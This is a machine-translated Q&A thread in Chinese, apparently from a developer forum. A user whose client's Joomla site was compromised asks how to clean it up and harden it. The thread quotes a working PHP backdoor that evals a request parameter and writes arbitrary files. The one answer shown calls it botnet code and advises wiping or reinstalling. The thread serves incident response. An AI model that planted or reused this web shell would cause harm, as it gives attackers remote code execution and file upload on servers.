我有一个客户的Joomla网站遭到黑客攻击,我不确定它是如何发生的但我可以看到有很多脚本发送垃圾邮件,搜索包含 eval(一词的文件/ strong>我找到了61个匹配项,如下面的文件:
<?php
$lbdw = "495c05e857e328e1e65ca6b0bc03dc88";
if (isset($_REQUEST['tlhqdsj'])) {
$mglvq = $_REQUEST['tlhqdsj'];
eval($mglvq);
exit();
}
if (isset($_REQUEST['ofva'])) {
$ulmajcbk = $_REQUEST['tbun'];
$cdpumv = $_REQUEST['ofva'];
$tgcjl = fopen($cdpumv, 'w');
$ogrmbcz = fwrite($tgcjl, $ulmajcbk);
fclose($tgcjl);
echo $ogrmbcz;
exit();
}
?>
我不想删除整个网站,因为我没有开发它,我只需要一个安全检查表和一种搜索其他已知漏洞的方法。
我应该在安装此Joomla网站的服务器上采取哪些其他预防措施?
知道他们如何将这么多文件上传到服务器吗?
答案 0 :(得分:2)
这是一个僵尸网络PHP文件,可能通过Joomla中的漏洞进行传播(例如,8月中旬就有一个漏洞)。它允许远程用户执行任意PHP代码并将文件上传到您的服务器。有关详细信息,请参阅Joomla security page。
我最强烈的建议是擦除整个服务器 - 或者至少是客户用户可以访问的任何内容 - 并重新开始。你永远不知道攻击者上传了什么,你可以从来没有完全确定没有更多的后门存在。
如果这是不可行的,我建议擦除Joomla安装并重新安装Joomla 2.5.14或3.1.5的新副本。
如果您甚至无法那,那么您可以尝试就地升级Joomla,搜索受感染的PHP文件并删除它们。但是你冒着很大的风险,你会错过一个文件并且仍然容易受到攻击。
答案 1 :(得分:2)